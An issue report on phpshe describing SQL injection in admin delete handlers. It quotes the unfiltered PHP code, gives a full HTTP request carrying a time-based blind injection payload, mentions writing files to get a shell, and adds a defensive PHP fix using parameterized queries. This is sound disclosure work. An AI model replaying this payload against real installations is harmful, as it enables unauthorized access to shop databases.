
koyshe / phpshe


I found multiple SQL injections in the admin backend.

Status: To do
Created on 2018-10-18 23:52
1. A vulnerability point

Look at the code

admin/user.php

	case 'del':
		pe_token_match();
		// batch delete passes the raw $_p_user_id array through unfiltered; only the single-id path goes through intval()
		if ($db->pe_delete('user', array('user_id'=>is_array($_p_user_id) ? $_p_user_id : intval($_g_id)))) {
			pe_success('会员删除成功!');
		}
		else {
			pe_error('会员删除失败...');
		}
	break;

It turns out that when a single record is deleted, intval processing is applied, but when records are deleted in batch, the values are substituted directly into the statement, so the payload is constructed as follows.

POST /phpshe/admin.php?mod=user&act=del&token=d52aa9e11515574f774c9da971a4ae10 HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Referer: http://www.test.com/fiyocms/
Cookie: PHPSESSID=2j08sefmgofettspbuso00fs07
Connection: keep-alive
Upgrade-Insecure-Requests: 1

checkall=on&user_id%5B%5D=2') and if(1,sleep(5),1)#


2. Additional code for this type of situation

admin/userbank.php

	case 'del':
		pe_token_match();
		// here neither path is filtered: the batch array and the single $_g_id are both used as-is
		$userbank_id = is_array($_p_userbank_id) ? $_p_userbank_id : $_g_id;
		if ($db->pe_delete('userbank', array('userbank_id'=>$userbank_id))) {
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;

admin/userlevel.php

	case 'del':
		pe_token_match();
		$userlevel_id = is_array($_p_userlevel_id) ? $_p_userlevel_id : intval($_g_id);
		if ($db->pe_delete('userlevel', array('userlevel_id'=>$userlevel_id))) {
			cache_write('userlevel');
			userlevel_callback();
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;

admin/ad.php

	case 'del':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_delete('ad', array('ad_id'=>$ad_id))) {
			cache_write('ad');
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;
	//####################// Ad status //####################//
	case 'state':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_update('ad', array('ad_id'=>$ad_id), array('ad_state'=>$_g_state))) {
			cache_write('ad');
			pe_success("操作成功!");
		}
		else {
			pe_error("操作失败...");
		}
	break;
	//####################// Ad list //####################//
	default :
		$_g_type && $sql_where .= " and `ad_type` = '{$_g_type}'";
		$_g_position && $sql_where .= " and `ad_position` = '{$_g_position}'";
		$sql_where .= " order by `ad_order` asc, `ad_id` desc";
		$info_list = $db->pe_selectall('ad', $sql_where, '*', array(20, $_g_page));
3. Now I am looking for another example to verify.

If the target environment grants the permission, we can read files or write a file to getshell.
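As an added defensive example (not phpshe's own code; `normalize_ids`, `build_delete_in` and the PDO usage are assumptions), this is how the `del` handlers above could apply one integer filter to both the batch array and the single id, then bind the survivors as placeholders instead of substituting them into the statement:

```php
<?php
// Added example, not phpshe code: one integer filter for both the batch
// ($_p_<name>_id array) and single ($_g_id) paths, then bound placeholders.

// Accept a scalar id or an array of ids and return a de-duplicated list of
// positive integers. Non-integer strings are dropped rather than cast, so
// "2') and if(1,sleep(5),1)#" is rejected instead of silently becoming 2.
function normalize_ids($value): array
{
    $ids = [];
    foreach ((is_array($value) ? $value : [$value]) as $v) {
        if (!is_string($v) && !is_int($v)) {
            continue; // nested arrays or other types are never valid ids
        }
        $s = trim((string) $v);
        if (preg_match('/^[1-9][0-9]*$/', $s)) {
            $ids[(int) $s] = true;
        }
    }
    return array_keys($ids);
}

// Build "DELETE FROM t WHERE c IN (?, ?, ...)" with one placeholder per id.
// Returns [sql, params], or null when no safe id survived, so the caller
// never issues a DELETE with an empty IN list.
function build_delete_in(string $table, string $column, array $ids): ?array
{
    // Identifiers cannot be bound, so restrict them to a safe shape instead.
    foreach ([$table, $column] as $ident) {
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $ident)) {
            throw new InvalidArgumentException("bad identifier: $ident");
        }
    }
    if ($ids === []) {
        return null;
    }
    $placeholders = implode(', ', array_fill(0, count($ids), '?'));
    return ["DELETE FROM `$table` WHERE `$column` IN ($placeholders)", array_values($ids)];
}

// Constructed input modelled on the report's body
// (checkall=on&user_id[]=2') and if(1,sleep(5),1)#) plus benign ids.
$postUserId = ["2') and if(1,sleep(5),1)#", "7", "7", " 13 "];
$stmt = build_delete_in('user', 'user_id', normalize_ids($postUserId));
if ($stmt !== null) {
    [$sql, $params] = $stmt;
    echo $sql, PHP_EOL;   // the injected value never reaches the query text
    print_r($params);
    // With a PDO handle: $pdo->prepare($sql)->execute($params);
}
```

Rejecting malformed ids outright (instead of intval) also gives the admin UI a clear signal that the request was tampered with, which is worth logging.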

Comments (0)

p0desta created the task
